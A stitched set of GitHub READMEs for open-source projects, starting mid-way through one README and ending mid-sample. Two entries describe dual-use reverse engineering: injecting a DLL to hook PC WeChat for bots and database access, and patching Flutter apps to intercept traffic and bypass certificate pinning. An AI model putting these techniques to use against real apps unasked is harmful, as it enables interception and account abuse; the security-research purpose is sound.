Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure for your Bullet Train application which will cost about **$30/month**.
When you're done deploying to Render, you need to go into "Dashboard" > "web", copy the server URL, and then go into "Env Groups" > "settings" and paste the URL into the value for `BASE_URL`.
### Heroku
[![Deploy to Heroku](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=http://github.com/bullet-train-co/bullet_train)
Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure and services for your Bullet Train application which will cost about **$140/month**.
Once that process has completed, be sure to complete the other steps from the [Deploying to Heroku](https://bullettrain.co/docs/heroku) documentation.
## Contribute to Bullet Train
If you're looking contribute to Bullet Train, you should "Fork" this template repository on GitHub, like so:
1. Visit https://github.com/bullet-train-co/bullet_train.
2. Click "Fork" in the top-right corner.
3. Select the account where you want to fork the repository.
4. Click the "Code" button on the new repository and copy the SSH path.
5. Clone your forked repository using the SSH path you copied, like so:
```
git clone git@github.com:your-account/bullet_train.git
cd bullet_train
```
6. Run the setup script:
```
bin/setup
```
7. Start the application:
```
bin/dev
```
> [!NOTE]
> Optional: If you have [ngrok](https://ngrok.com/) installed, uncomment `ngrok: ngrok http 3000` from `Procfile.dev` and run
> `bin/set-ngrok-url` to set `BASE_URL` to a publically accessible domain.
> Run `bin/set-ngrok-url` after restarting `ngrok` to update `BASE_URL` to
> the current public url.
8. Visit http://localhost:3000.
---
This `README.md` file will be replaced with [`README.example.md`](./README.example.md) after running `bin/configure`.
| The Open Source Ruby on Rails SaaS Template | rails,saas,bullet-train | 91 | 66 | 1,268 | 1,823 | 76 | 89 | 12 |
ljc545w/ComWeChatRobot | # 描述
PC微信机器人,实现以下功能:
1. 获取通讯录
2. 发送文本、图片、文件、xml文章、名片、群艾特消息
3. 根据wxid查询好友信息
4. 根据群ID获取所有群成员wxid
5. 检测好友状态(是否好友、被删除、被拉黑)
6. 接收各类消息,可写回调函数进行处理
7. 封装COM接口,方便使用自己喜欢的语言进行调用
8. 群管理
9. 微信多开
# 用途
1. 淘客发单
2. 无痕清粉
3. 微信公众号采集
4. 聊天记录备份
5. 其他你能想到的用途
# 可用版本
微信电脑版**3.5.0.46**
微信电脑版**3.6.0.18**
微信电脑版**3.7.0.26**
微信电脑版**3.7.0.30**
主分支对应微信3.7.0.30版本,其他版本请查看对应分支。
# 编译环境
**Visual Studio 2019**(平台配置:win32(x86))
# 原理
通过逆向PC微信,定位到关键CALL,dll内联汇编调用
注册32位COM组件,供64位/32位进程外部调用
# 目录说明
`./CWeChatRobot`:COM组件的实现代码
`./DWeChatRobot`:注入的DLL实现代码,根据平台配置可编译出socket版和COM版
`./old_projects`: 包含C#的调用示例以及3.7.0.26版本的E语言调用
`./Python`:python示例和接口测试文件
`./wxDriver`:driver的实现代码
下载二进制文件请到:[Release](https://github.com/ljc545w/ComWeChatRobot/releases)
# 快速启动
以管理员权限执行以下命令:
```shell
# 安装
CWeChatRobot.exe /regserver
# 卸载
CWeChatRobot.exe /unregserver
```
# 调用
**Python:**
参考[wxRobot.py](/Python/com/wxRobot.py)
**C#:**
参考[ComWechatRobotCsharp](https://github.com/RingoStudio/ComWechatRobotCsharp),感谢@RingoStudio 的贡献
**易语言:**
参考[ESDK](/old_projects/ESDK),感谢@lovezm 的贡献
# 更多功能
1. 尝试添加issue中的功能
有空的时候会按照上述顺序进行开发,不过嘛,计划只是计划,如果未实现也请见谅
**也欢迎您提交PR**
# 更新记录
## 2022.04.01
1. 使用SAFEARRAY返回通讯录列表,可正确显示好友昵称中的特殊符号
2. README中添加目录说明
3. 更新C#示例代码,添加好友列表的遍历示例
## 2022.04.11
1. 修改获取个人信息接口和发送文章接口,兼容老版wxid(未经测试,如有问题请提ISSUE)
2. 添加接收消息的接口,可以写回调对消息进行处理(参考Python示例文件)
## 2022.04.12
1. 添加发送群艾特消息的接口
## 2022.04.12
1. 添加通过群ID获取所有群成员wxid接口
## 2022.04.13
1. 更新群艾特接口,可同时艾特多人
## 2022.04.18
1. 添加获取数据库句柄接口(部分句柄,获取全量句柄需Hook)
2. 添加执行SQL命令接口
3. 添加在线数据库备份接口
## 2022.06.01
1. 适配微信**3.7.0.26**版本,部分功能未经测试,如有问题请报issue
## 2022.06.02
1. 添加通过好友申请接口(配合接收消息接口可自动通过好友)
2. 添加获取聊天记录数据库句柄(好友申请消息类型为0x25)
3. 优化了StartService接口,重复注入时不再关闭远程进程
## 2022.06.04
1. 完成通过wxid和v3数据加好友的COM接口(后续添加通过微信号、手机号、QQ号查询V3数据接口)
2. 优化接收消息逻辑,添加消息时间;新增Hook发送消息,返回数据中以一个BOOL值区分发送和接收
3. 修复了一个BUG,该BUG可能导致Release配置下,COM接口无法正常加载DWeChatRobot.dll计算偏移
## 2022.06.07
1. 添加获取当前微信版本(读注册表)和启动微信的接口
2. 优化数据库查询接口,现在可以正常查询BLOB类型
## 2022.06.10
1. 新增关注公众号、网络查询用户信息、Hook语音、未加密图片、自定义微信版本号接口
2. Hook语音和图片的接口暂时还有瑕疵,图片收到后有可能不会自动下载;语音消息的文件名暂时是时间戳,计划替换为该条消息id。有空再做优化。
## 2022.06.13
1. 优化发送艾特消息接口,新增一个参数,指示是否自动填充被艾特人昵称
2. 优化发送文章消息接口,新增一个参数,用于展示消息卡片缩略图
3. 新增删除好友接口
4. 新增发送小程序接口
## 2022.06.18
1. 修复了多个BUG
2. 整理代码结构,方便后续开发基于websocket的接口
3. 添加64位程序注入DLL到32位程序的driver
## 2022.06.24
1. 解决Python脚本中,socket接收数据可能不完整的问题
2. 解决心跳时如果同步了同一个人的多条消息,只会返回一条的问题
3. 感谢@shangdev 提供的思路,现在开启hook图片的时会修改自动下载图片时段为全天
## 2022.06.30
1. 已适配3.7.0.30版本
## 2022.07.19
1. 新增修改备注接口
2. 新增群管理功能,包括添加成员、删除成员、设置公告、修改群名称、设置群内个人昵称、获取群成员昵称
## 2022.07.24
1. 添加多开管理
## 2022.07.28
1. 解决部分已知问题,优化多开管理
2. 重构COM中的部分实现
## 2022.08.13
1. 现在消息HOOK内容包含消息ID
2. 完成发送消息的http接口,可参考[wxDriver.py](/Python/http/wxDriver.py),其他接口还需要一点时间
3. 新增项目配置文件,感谢@amchii 提供的方法
## 2022.08.21
1. 所有功能http接口封装完成,可接受get、post请求
2. 提供http接口调用示例,参考[wxDriver.py](/Python/http/wxDriver.py)
## 2022.08.25
1. 接收消息格式修改为json,现在也可以获取到扩展信息,可从扩展信息中获取到文件保存路径或被艾特人wxid
2. 优化获取个人信息,获取好友信息接口
## 2022.09.09
1. 新增打开微信内置浏览器的功能
2. 新增获取公众号历史消息功能(具体能获取多少未测试,请谨慎使用,以防封号)
3. 修复了一个bug,该bug会导致图片和语音保存到微信安装目录而非指定的目录
4. 优化实时消息接口,现在会带上自己的wxid
5. 优化图片和语音保存路径,方便区分来自不同账号的消息
## 2022.09.10
1. 中秋节快乐
2. 新增转发消息功能,请勿转发语音、红包等消息
3. 实时消息接口新增`localId`字段,该字段用于转发消息接口;现在也可以接收到撤回消息提醒
4. 优化COM连接点,在线程中进行消息广播,客户端可以阻塞以等待图片、语音等资源落地
## 2022.09.18
1. 修复了一个bug,在多个MSG.db存在时,无法转发准确的消息;现在转发消息功能使用msgid作为参数
2. 修复了一个bug,该bug曾导致微信没有选中的会话时,无法获取实时消息
3. 修复了一个bug,该bug曾导致部分微信号获取个人信息时出现内存访问冲突
4. 优化实时消息接口,不再返回localId字段;extrabuf现在返回原始信息而不是base64编码数据;新增一个字段,用于区分是否手机发送的消息(接收到的消息不含该字段)
5. 优化个人信息接口,现在可以返回个人文件夹路径
6. 优化群艾特接口,优先填充群内昵称
7. 新增获取二维码接口,调用该接口时会切换到二维码登录
## 2022.09.22
1. 新增获取a8key功能
2. 修复了一个bug,该bug曾导致获取数据库句柄接口只能生效一次
## 2022.09.27
1. 优化转发消息接口、获取数据库句柄接口,实时消息添加原始时间戳
## 2022.10.07
1. 新增发送原始xml接口
2. 新增退出登录接口
3. 尝试修复文件发送失败和格式化时间戳导致崩溃问题
4. 实时消息新增一个字段,用于获取视频消息缩略图保存位置
## 2022.10.16
1. 新增收款接口
2. 实时消息接口优化,支持获取音视频聊天信息,支持获取手机端切换联系人时的提示信息
3. 修复部分已知问题
## 2022.11.2
1. 支持发送动态表情
2. 支持夜间自动下载视频(需开启一次实时消息监听)
3. 新增通过消息id下载消息附件功能
# 打赏作者
请给作者一个star,感谢感谢
# 免责声明
代码仅供交流学习使用,请勿用于非法用途和商业用途!如因此产生任何法律纠纷,均与作者无关!
| PC微信机器人,实现获取通讯录,发送文本、图片、文件等消息,封装COM接口供Python、C#调用 | component,http,wechat,wechat-bot,windows | 13 | 6 | 44 | 169 | 50 | 5 | 0 |
upstash/ratelimit-js | # Upstash Rate Limit
[![npm (scoped)](https://img.shields.io/npm/v/@upstash/ratelimit)](https://www.npmjs.com/package/@upstash/ratelimit)
[![Tests](https://github.com/upstash/ratelimit/actions/workflows/tests.yaml/badge.svg)](https://github.com/upstash/ratelimit/actions/workflows/tests.yaml)
> [!NOTE]
> **This project is in GA Stage.**
> The Upstash Professional Support fully covers this project. It receives regular updates, and bug fixes. The Upstash team is committed to maintaining and improving its functionality.
It is the only connectionless (HTTP based) rate limiting library and designed
for:
- Serverless functions (AWS Lambda, Vercel ....)
- Cloudflare Workers & Pages
- Vercel Edge
- Fastly Compute@Edge
- Next.js, Jamstack ...
- Client side web/mobile applications
- WebAssembly
- and other environments where HTTP is preferred over TCP.
## Quick Start
### Install
#### npm
```bash
npm install @upstash/ratelimit
```
#### Deno
```ts
import { Ratelimit } from "https://cdn.skypack.dev/@upstash/ratelimit@latest";
```
### Create database
Create a new redis database on [upstash](https://console.upstash.com/). See [here](https://github.com/upstash/upstash-redis#quick-start) for documentation on how to create a redis instance.
### Basic Usage
```ts
import { Ratelimit } from "@upstash/ratelimit"; // for deno: see above
import { Redis } from "@upstash/redis"; // see below for cloudflare and fastly adapters
// Create a new ratelimiter, that allows 10 requests per 10 seconds
const ratelimit = new Ratelimit({
redis: Redis.fromEnv(),
limiter: Ratelimit.slidingWindow(10, "10 s"),
analytics: true,
/**
* Optional prefix for the keys used in redis. This is useful if you want to share a redis
* instance with other applications and want to avoid key collisions. The default prefix is
* "@upstash/ratelimit"
*/
prefix: "@upstash/ratelimit",
});
// Use a constant string to limit all requests with a single ratelimit
// Or use a userID, apiKey or ip address for individual limits.
const identifier = "api";
const { success } = await ratelimit.limit(identifier);
if (!success) {
return "Unable to process at this time";
}
doExpensiveCalculation();
return "Here you go!";
```
For more information on getting started, you can refer to [our documentation](https://upstash.com/docs/oss/sdks/ts/ratelimit/gettingstarted).
[Here's a complete nextjs example](https://github.com/upstash/ratelimit/tree/main/examples/nextjs)
## Documentation
See [the documentation](https://upstash.com/docs/oss/sdks/ts/ratelimit/overview) for more information details about this package.
## Contributing
### Database
Create a new redis database on [upstash](https://console.upstash.com/) and copy
the url and token.
### Running tests
To run the tests, you will need to set some environment variables. Here is a list of
variables to set:
- `UPSTASH_REDIS_REST_URL`
- `UPSTASH_REDIS_REST_TOKEN`
- `US1_UPSTASH_REDIS_REST_URL`
- `US1_UPSTASH_REDIS_REST_TOKEN`
- `APN_UPSTASH_REDIS_REST_URL`
- `APN_UPSTASH_REDIS_REST_TOKEN`
- `EU2_UPSTASH_REDIS_REST_URL`
- `EU2_UPSTASH_REDIS_REST_TOKEN`
You can create a single Upstash Redis and use its URL and token for all four above.
Once you set the environment variables, simply run:
```sh
pnpm test
```
| Rate limiting library for serverless runtimes | rate-limiting,redis,serverless,upstash,upstash-ratelimit,upstash-sdk | 52 | 33 | 72 | 260 | 1 | 17 | 3 |
sea-team/gofound | # GoFound
`GoFound` 一个golang实现的全文检索引擎,支持持久化和单机亿级数据毫秒级查找。
接口可以通过http调用。
详见 [API文档](./docs/api.md)
## 文档
+ [示例](./docs/example.md)
+ [API文档](./docs/api.md)
+ [索引原理](./docs/index.md)
+ [配置文档](./docs/config.md)
+ [持久化](./docs/storage.md)
+ [编译部署](./docs/compile.md)
## 在线体验
> Simple社区使用的GoFound,可以直接模糊搜索相关帖子
[在线体验](https://simpleui.72wo.com/search/simpleui)
## GoFound在线管理后台Demo
[http://119.29.69.50:5678/admin](http://119.29.69.50:5678/admin)
![](./docs/images/img1.png)
![](./docs/images/img2.png)
## QQ交流群
[556102631](https://qm.qq.com/cgi-bin/qm/qr?k=4OvO7bgRAhSLX0J2WXVbCWbY7hL7gMYd&jump_from=webapi)
## 二进制文件下载
> 支持Windows、Linux、macOS、(amd64和arm64)和苹果M1 处理器
[点击下载](https://github.com/newpanjing/gofound/releases)
## 技术栈
+ 二分法查找
+ 快速排序法
+ 倒排索引
+ 正排索引
+ 文件分片
+ golang-jieba分词
+ leveldb
### 为何要用golang实现一个全文检索引擎?
+ 正如其名,`GoFound`去探索全文检索的世界,一个小巧精悍的全文检索引擎,支持持久化和单机亿级数据毫秒级查找。
+ 传统的项目大多数会采用`ElasticSearch`来做全文检索,因为`ElasticSearch`够成熟,社区活跃、资料完善。缺点就是配置繁琐、基于JVM对内存消耗比较大。
+ 所以我们需要一个更高效的搜索引擎,而又不会消耗太多的内存。 以最低的内存达到全文检索的目的,相比`ElasticSearch`,`gofound`是原生编译,会减少系统资源的消耗。而且对外无任何依赖。
## 安装和启动
> 下载好源码之后,进入到源码目录,执行下列两个命令
>
+ 编译
> 直接下载 [可执行文件](https://github.com/newpanjing/gofound/releases) 可以不用编译,省去这一步。
```shell
go get && go build
```
+ 启动
```shell
./gofound --addr=:8080 --data=./data
```
+ docker部署
```shell
docker build -t gofound .
docker run -d --name gofound -p 5678:5678 -v /mnt/data/gofound:/usr/local/go_found/data gofound:latest
```
+ 其他命令
参考 [配置文档](./docs/config.md)
## 多语言SDK
> 使用gofound的多语言SDK,可以在不同语言中使用gofound。但是请注意,版本号与gofound需要一致。主版本和子版本号,修订版不一致不影响。
[Java](https://github.com/newpanjing/gofound-java)
[Python](https://github.com/newpanjing/gofound-python)
[Node.js](https://github.com/newpanjing/gofound-nodejs)
其他语言的SDK,正在陆续完善中。也可以直接通过[API文档](./docs/api.md)用HTTP请求实现。
## 和ES比较
| ES | GoFound |
|-------------|-----------------------|
| 支持持久化 | 支持持久化 |
| 基于内存索引 | 基于磁盘+内存缓存 |
| 需要安装JDK | 原生二进制,无外部依赖 |
| 需要安装第三方分词插件 | 自带中文分词和词库 |
| 默认没有可视化管理界面 | 自带可视化管理界面 |
| 内存占用大 | 基于Golang原生可执行文件,内存非常小 |
| 配置复杂 | 默认可以不加任何参数启动,并且提供少量配置 |
## 待办
[TODO](docs/TODO.md)
## 使用GoFound的用户
[Simple社区](https://simpleui.72wo.com)| [贝塔博客](https://www.88cto.com) | [Book360](https://www.book360.cn)
[深圳市十二点科技有限公司](https://www.72wo.com)|[深圳市恒一博科技有限公司](http://www.hooebo.com)
[西安易神网络信息系统服务有限公司](http://www.hansonvip.com/)
[影视资源搜索](https://movie.ipip.icu)|[酷易物联](https://cooleiot.tech)|[French博客](https://hoime.cn/)
[好咪二次元之家](http://hoime.space)
## 发布日志
[发布日志](https://github.com/newpanjing/gofound/releases)
## 开发成员
|姓名|联系方式|贡献部分|
|---|---|---|
|[newpanjing](https://github.com/newpanjing)|newpanjing@icloud.com|负责人、引擎、UI|
|[XiaoK29](https://github.com/XiaoK29)|-|引擎、接口|
|[nightzjp](https://github.com/nightzjp)|-|引擎|
|[xiao luobei](https://github.com/liu-cn)|-|引擎|
| GoFound GoLang Full text search go语言全文检索引擎,毫秒级查询。 使用http接口调用,集成Admin管理界面,任何系统都可以使用。 | null | 9 | 13 | 43 | 162 | 26 | 3 | 1 |
PeterStrick/ViVeTool-GUI | ![GitHub all releases](https://img.shields.io/github/downloads/peterstrick/vivetool-gui/total)
![GitHub License](https://img.shields.io/github/license/peterstrick/vivetool-gui)
![GitHub release (latest by date)](https://img.shields.io/github/v/release/peterstrick/vivetool-gui)
[![](https://dcbadge.vercel.app/api/server/8vDFXEucp2?style=flat)](https://discord.gg/8vDFXEucp2)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=PeterStrick_ViVeTool-GUI&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=PeterStrick_ViVeTool-GUI)
[![Translation](https://weblate.rawrr.dev/widgets/vivetool-gui/-/svg-badge.svg)](https://weblate.rawrr.dev/engage/vivetool-gui)
# ViVeTool GUI <img src="/images/icons8-advertisement-page-96.png" alt="ViVeTool GUI Logo" width="32"/>
### Windows Feature Control GUI based on ViVeTool
## What is ViVeTool GUI?
ViVeTool GUI lets you easily enable, disable and search for new hidden Features in Windows Insider Builds, with the use of a Button and a pretty UI.
## Disclaimer.
### No one, including me / [PeterStrick](https://github.com/PeterStrick), [the creators of ViVe and ViVeTool](https://github.com/thebookisclosed/ViVe) or [the creators of mach2](https://github.com/riverar/mach2) are responsible for any damage or unintended side effects, this program might cause to your computer, by changing the Windows Feature Store. Use this program at your own risk.
## How to use it?
Using it is simple,
Either:
1. Select the Build for which you want to enable or disable features for.
2. Wait for it to load in, open one of the Groups by pressing the Arrow, and select the Feature that you are looking for.
3. Press on Perform Action and perform your desired action for the entered feature ID.
<img width="511" height="355" src="/images/Method1.gif" alt="Image showing you how to perform Method 1" />
---
Or:
1. Press on "Manually change a Feature" (F12)
2. Enter a Feature ID
3. Press on Perform Action and perform your desired action for the selected feature.
<img width="511" height="355" src="/images/Method2.gif" alt="Image showing you how to perform Method 2" />
---
## What are the additional features?
Apart from being able to manage features, ViVeTool GUI let´s you also:
- Load in a Feature List of other Builds
- Search for Features
- Sort Features by Feature Name, Feature ID or Feature State
- Group Features by: Always Enabled, Always Disabled, Enabled by Default, Disabled by Default and Modifiable
- Copy Feature Names and IDs by right-clicking them
- Switch between Dark and Light Mode (Setting get´s saved and applied on Start)
- Automatically load the latest Feature List when starting ViVeTool GUI
- Scan a Windows Build for Hidden Features to create your own Feature List
- Use ViVeTool GUI in multiple translated Languages
- Fix the LastKnownGood Store, as well as the A/B Testing Priorities for ViVeTool Features
- and at last, view the About Box by either pressing on the About Icon, or selecting the "About..." Item in the Application System Menu.
<img width="511" height="175" src="/images/Searching.gif" alt="Image showing you how to search" />
## What are the System Requirements?
Since ViVeTool GUI uses the ViVe API, Windows 10 Build 18963 (Version 2004) and newer is the only OS Requirement.
Apart from that, the only Requirement is .Net Framework 4.8
## Why not just use ViVeTool?
Using ViVeTool GUI is more easier and user-friendly, besides it lets you also search for features and enable them with a few clicks.
# Licensing
ViVeTool GUI uses Icons from [icons8.com](https://icons8.com/)
ViVeTool GUI is inspired by [ViVeTool](https://github.com/thebookisclosed/ViVe) and uses the [ViVe API](https://github.com/thebookisclosed/ViVe/tree/master/ViVe)
ViVeTool GUI uses [files](https://github.com/riverar/mach2/tree/master/features) from [mach2](https://github.com/riverar/mach2) for the Build Combo Box.
ViVeTool GUI - Feature Scanner uses [mach2](https://github.com/riverar/mach2) to create it's Feature Lists
| Windows Feature Control GUI based on ViVe / ViVeTool | windows10,windows-10,windows11,windows-11,windows,windows-features,vive,vivetool,mach2,feature-control | 15 | 5 | 37 | 137 | 3 | 2 | 2 |
twoyi/twoyi | <div align="center">
<p><b>Due to the complexity of the project and lack of any revenue, the project has been discontinued.</b></p>
</div>
<div align="center">
<p>
<h3>
<b>
Twoyi Platform
</b>
</h3>
</p>
<p>
<b>
A lightweight Android container
</b>
<br/>
</p>
<p>
[![contributions welcome](https://img.shields.io/badge/Contributions-welcome-brightgreen?logo=github)](CODE_OF_CONDUCT.md) [![Website](https://img.shields.io/badge/Website-available-brightgreen?logo=e)](https://twoyi.io)
</p>
<p>
<sub>
Made with ❤︎ by
<a href="https://github.com/tiann">
weishu
</a>
</sub>
</p>
<br />
<p>
<a href="https://twoyi.io">
<img
src="https://github.com/twoyi/twoyi/blob/main/assets/twoyi_screen.jpg?raw=true"
alt="Screenshot"
width="25%"
/>
</a>
</p>
</div>
[README 中文版](README_CN.md)
## Introduction
Twoyi is a lightweight Android container. It runs a nearly complete Android system as a normal app (no root required) on Android. Additionally, it supports Android 8.1 ~ 12.
## Capability
1. Use Taichi·Yang without unlocking the bootloader. Xposed, EdXposed and LSPosed will be supported.
2. Use root on non-rooted devices.
3. Use a few Magisk modules.
4. Implement additional system components such as virtual camera by virtualizing the HAL layer.
5. Do security research such as shelling.
## Features
1. Twoyi is a rootless Android system-level container, which runs a nearly complete Android system as a normal app and is mostly isolated from the main system.
2. The internal Android version is Android 8.1 and Android 10 will be supported.
3. Booting up twoyi is very fast (within three seconds) except for the initialization process.
4. Twoyi is an open source project.
5. The internal system of twoyi will be fully customizable. Because its system is open source, you can fork the project to compile your own system. You can also customize the system components, such as the HAL layer to implement virtual cameras, virtual sensors and other special features.
## Building
Twoyi contains two parts:
1. The twoyi app, which is actually a UI rendering engine.
2. The internal ROM of twoyi.
This repository contains the twoyi app, and the twoyi ROM is currently being turned into open-source. Therefore, at this moment, the ROM cannot be compiled from source yet.
### Build the App manually
#### Install Rust
Twoyi is partially written in Rust, so it's nessesary to [install Rust and Cargo](https://www.rust-lang.org/tools/install) first.
#### Install cargo-xdk
Please refer to [cargo-xdk](https://github.com/tiann/cargo-xdk).
You can check if it is installed by running `./gradlew cargoBuild`. If it succeeded, you will see libtwoyi.so in `app/src/main/jniLibs/arm64-v8a`.
PS. Please use ndk v22 or lower, otherwise it may fail.
#### Integrating rootfs
Currently you cannot build the ROM yourself, instead you can use the prebuilt ROM.
To do that, extract rootfs.7z from the official release apk and copy it to `app/src/main/assets`.
### Build the app with Android Studio
Build it with Android Studio normally.
### Build the ROM
WIP
## Discussion
[Telegram Group](https://t.me/twoyi)
## Contact Me
twsxtd@gmail.com
| A lightweight Android container on Android | twoyi,virtual,android | 3 | 7 | 13 | 97 | 24 | 1 | 0 |
simonw/shot-scraper | # shot-scraper
[![PyPI](https://img.shields.io/pypi/v/shot-scraper.svg)](https://pypi.org/project/shot-scraper/)
[![Changelog](https://img.shields.io/github/v/release/simonw/shot-scraper?include_prereleases&label=changelog)](https://github.com/simonw/shot-scraper/releases)
[![Tests](https://github.com/simonw/shot-scraper/workflows/Test/badge.svg)](https://github.com/simonw/shot-scraper/actions?query=workflow%3ATest)
[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](https://github.com/simonw/shot-scraper/blob/master/LICENSE)
[![discord](https://img.shields.io/discord/823971286308356157?label=discord)](https://discord.gg/EE7Hx4Kbny)
A command-line utility for taking automated screenshots of websites
For background on this project see [shot-scraper: automated screenshots for documentation, built on Playwright](https://simonwillison.net/2022/Mar/10/shot-scraper/).
## Documentation
- [Full documentation for shot-scraper](https://shot-scraper.datasette.io/)
- [Tutorial: Automating screenshots for the Datasette documentation using shot-scraper](https://simonwillison.net/2022/Oct/14/automating-screenshots/)
- [Release notes](https://github.com/simonw/shot-scraper/releases)
## Get started with GitHub Actions
To get started without installing any software, use the [shot-scraper-template](https://github.com/simonw/shot-scraper-template) template to create your own GitHub repository which takes screenshots of a page using `shot-scraper`. See [Instantly create a GitHub repository to take screenshots of a web page](https://simonwillison.net/2022/Mar/14/shot-scraper-template/) for details.
## Quick installation
You can install the `shot-scraper` CLI tool using [pip](https://pip.pypa.io/):
pip install shot-scraper
# Now install the browser it needs:
shot-scraper install
## Taking your first screenshot
You can take a screenshot of a web page like this:
shot-scraper https://datasette.io/
This will create a screenshot in a file called `datasette-io.png`.
Many more options are available, see [Taking a screenshot](https://shot-scraper.datasette.io/en/stable/screenshots.html) for details.
## Examples
- The [shot-scraper-demo](https://github.com/simonw/shot-scraper-demo) repository uses this tool to capture recently spotted owls in El Granada, CA according to [this page](https://www.owlsnearme.com/?place=127871), and to generate an annotated screenshot illustrating a Datasette feature as described [in my blog](https://simonwillison.net/2022/Mar/10/shot-scraper/#a-complex-example).
- The [Datasette Documentation](https://docs.datasette.io/en/latest/) uses screenshots taken by `shot-scraper` running in the [simonw/datasette-screenshots](https://github.com/simonw/datasette-screenshots) GitHub repository, described in detail in [Automating screenshots for the Datasette documentation using shot-scraper](https://simonwillison.net/2022/Oct/14/automating-screenshots/).
- Ben Welsh built [@newshomepages](https://twitter.com/newshomepages), a Twitter bot that uses `shot-scraper` and GitHub Actions to take screenshots of news website homepages and publish them to Twitter. The code for that lives in [palewire/news-homepages](https://github.com/palewire/news-homepages).
- [scrape-hacker-news-by-domain](https://github.com/simonw/scrape-hacker-news-by-domain) uses `shot-scraper javascript` to scrape a web page. See [Scraping web pages from the command-line with shot-scraper](https://simonwillison.net/2022/Mar/14/scraping-web-pages-shot-scraper/) for details of how this works.
- Reuters uses shot-scraper to generate regularly updating data dashboards [for email newsletters](https://twitter.com/palewire/status/1658069533763026944).
| A command-line utility for taking automated screenshots of websites | playwright,playwright-python,scraping,screenshot-utility,screenshots | 29 | 18 | 33 | 215 | 36 | 4 | 3 |
HFrost0/bilix | # bilix
[![GitHub license](https://img.shields.io/github/license/HFrost0/bilix?style=flat-square)](https://github.com/HFrost0/bilix/blob/master/LICENSE)
![PyPI](https://img.shields.io/pypi/v/bilix?style=flat-square&color=blue)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/HFrost0/bilix)
![PyPI - Downloads](https://img.shields.io/pypi/dm/bilix?label=pypi%20downloads&style=flat-square)
⚡️Lightning-fast asynchronous download tool for bilibili and more
## Features
### ⚡️ Fast & Async
Asynchronous high concurrency support, controllable concurrency and speed settings.
### 😉 Lightweight & User-friendly
Lightweight user-friendly CLI with progress notification, focusing on core functionality.
### 📝 Fully-featured
Submissions, anime, TV Series, video clip, audio, favourite, danmaku ,cover...
### 🔨 Extensible
Extensible Python module suitable for more download scenarios.
## Install
```shell
pip install bilix
```
for macOS, you can also install `bilix` by `brew`
```shell
brew install bilix
```
## Usage Example
* If you prefer to use command line interface (cli)
```shell
bilix v 'url'
```
> `v` is a method short alias for `get_video`
* If you prefer to code with python
```python
from bilix.sites.bilibili import DownloaderBilibili
import asyncio
async def main():
async with DownloaderBilibili() as d:
await d.get_video('url')
asyncio.run(main())
```
## Community
If you find any bugs or other issues, feel free to raise an [Issue](https://github.com/HFrost0/bilix/issues).
If you have new ideas or new feature requests👍,welcome to participate in
the [Discussion](https://github.com/HFrost0/bilix/discussions)
If you find this project helpful, you can support the author by [Star](https://github.com/HFrost0/bilix/stargazers)🌟
## Contribute
❤️ Welcome! Details can be found in [Contributing](https://github.com/HFrost0/bilix/blob/master/CONTRIBUTING_EN.md)
| ⚡️Lightning-fast async download tool for bilibili and more | async,cli,download,python,asyncio,m3u8 | 72 | 12 | 36 | 434 | 12 | 2 | 3 |
Impact-I/reFlutter | [![stars](https://img.shields.io/github/stars/Impact-I/reFlutter)](https://github.com/Impact-I/reFlutter/stargazers)
<p align="center"><img src="https://user-images.githubusercontent.com/87244850/135659542-22bb8496-bf26-4e25-b7c1-ffd8fc0cea10.png" width="75%"/></p>
**Read more on the blog:** https://swarm.ptsecurity.com/fork-bomb-for-flutter/
This framework helps with Flutter apps reverse engineering using the patched version of the Flutter library which is already compiled and ready for app repacking. This library has snapshot deserialization process modified to allow you perform dynamic analysis in a convenient way.
Key features:
- `socket.cc` is patched for traffic monitoring and interception;
- `dart.cc` is modified to print classes, functions and some fields;
- display absolute code offset for functions
- contains minor changes for successfull compilation;
- if you would like to implement your own patches, manual Flutter code changes are supported using a specially crafted `Dockerfile`
### Supported engines
- Android: arm64, arm32;
- iOS: arm64;
- Release: Stable, Beta
### Install
```
# Linux, Windows, MacOS
pip3 install reflutter==0.7.8
```
### Usage
```console
impact@f:~$ reflutter main.apk
Please enter your Burp Suite IP: <input_ip>
SnapshotHash: 8ee4ef7a67df9845fba331734198a953
The resulting apk file: ./release.RE.apk
Please sign the apk file
Configure Burp Suite proxy server to listen on *:8083
Proxy Tab -> Options -> Proxy Listeners -> Edit -> Binding Tab
Then enable invisible proxying in Request Handling Tab
Support Invisible Proxying -> true
impact@f:~$ reflutter main.ipa
```
### Traffic interception
You need to specify the IP of your Burp Suite Proxy Server located in the same network where the device with the flutter application is. Next, you should configure the Proxy in `BurpSuite -> Listener Proxy -> Options tab`
- Add port: `8083`
- Bind to address: `All interfaces`
- Request handling: Support invisible proxying = `True`
<p align="center"><img src="https://user-images.githubusercontent.com/87244850/135753172-20489ef9-0759-432f-b2fa-220607e896b8.png" width="84%"/></p>
You don't need to install any certificates. On an Android device, you don't need root access as well. reFlutter also allows to bypass some of the flutter certificate pinning implementations.
### Usage on Android
The resulting apk must be aligned and signed. I use [uber-apk-signer](https://github.com/patrickfav/uber-apk-signer/releases/tag/v1.2.1)
`java -jar uber-apk-signer.jar --allowResign -a release.RE.apk`.
To see which code is loaded through DartVM, you need to run the application on the device. Note that you must manually find what `_kDartIsolateSnapshotInstructions` (ex. 0xB000 ) equals to using a binary search. reFlutter writes the dump to the root folder of the application and sets `777` permissions to the file and folder. You can pull the file with adb command
```console
impact@f:~$ adb -d shell "cat /data/data/<PACKAGE_NAME>/dump.dart" > dump.dart
```
<details>
<summary>file contents</summary>
```dart
Library:'package:anyapp/navigation/DeepLinkImpl.dart' Class: Navigation extends Object {
String* DeepUrl = anyapp://evil.com/ ;
Function 'Navigation.': constructor. (dynamic, dynamic, dynamic, dynamic) => NavigationInteractor {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000009270
}
Function 'initDeepLinkHandle':. (dynamic) => Future<void>* {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000412fe8
}
Function '_navigateDeepLink@547106886':. (dynamic, dynamic, {dynamic navigator}) => void {
Code Offset: _kDartIsolateSnapshotInstructions + 0x0000000000002638
}
}
Library:'package:anyapp/auth/navigation/AuthAccount.dart' Class: AuthAccount extends Account {
PlainNotificationToken* _instance = sentinel;
